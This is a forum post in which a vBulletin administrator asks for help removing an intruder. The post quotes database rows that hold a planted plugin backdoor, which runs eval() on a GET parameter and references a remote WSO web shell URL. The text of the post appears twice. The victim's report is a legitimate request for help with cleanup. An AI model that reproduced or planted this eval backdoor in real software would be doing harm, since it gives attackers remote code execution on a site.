xhells21
02-06-2012, 08:44 PM
public_html/forums appear always a file called wso.php whitch is a shell of some script kiddie who keeps hacking into my forum
then i checked the mysql database and found this
INSERT INTO `plugin` (`pluginid`, `title`, `hookname`, `phpcode`, `product`, `devkey`, `active`, `executionorder`) VALUES
(617, 'Sample', 'global_start', 'if (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));', 'vbulletin', '', 1, 5);
and
INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES
\r\n \r\nif (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));\r\n";s:10:"misc_start";s:53180:"\r\n if ($vbulletin->options[''vsatopstats_enable_global''] AND !is_member_of($vbulletin->userinfo, explode('','', $vbulletin->options[''vsatopstats_excl_groups''])))\r\n {\r\n $vsacb_resnr = $vbulletin->input->clean_gpc(''r'', ''vsacb_resnr'', TYPE_UINT);\r\n if ($vsacb_resnr < 1)\r\n {\r\n $vsacb_resnr = intval($vbulletin->options[''vsatopstats_amount_more'']);\r\n ( it continues i donno if i must paste all )
Please help me fight this hacker away from my forums !
then i checked the mysql database and found this
INSERT INTO `plugin` (`pluginid`, `title`, `hookname`, `phpcode`, `product`, `devkey`, `active`, `executionorder`) VALUES
(617, 'Sample', 'global_start', 'if (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));', 'vbulletin', '', 1, 5);
and
INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES
\r\n \r\nif (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));\r\n";s:10:"misc_start";s:53180:"\r\n if ($vbulletin->options[''vsatopstats_enable_global''] AND !is_member_of($vbulletin->userinfo, explode('','', $vbulletin->options[''vsatopstats_excl_groups''])))\r\n {\r\n $vsacb_resnr = $vbulletin->input->clean_gpc(''r'', ''vsacb_resnr'', TYPE_UINT);\r\n if ($vsacb_resnr < 1)\r\n {\r\n $vsacb_resnr = intval($vbulletin->options[''vsatopstats_amount_more'']);\r\n ( it continues i donno if i must paste all )
Please help me fight this hacker away from my forums !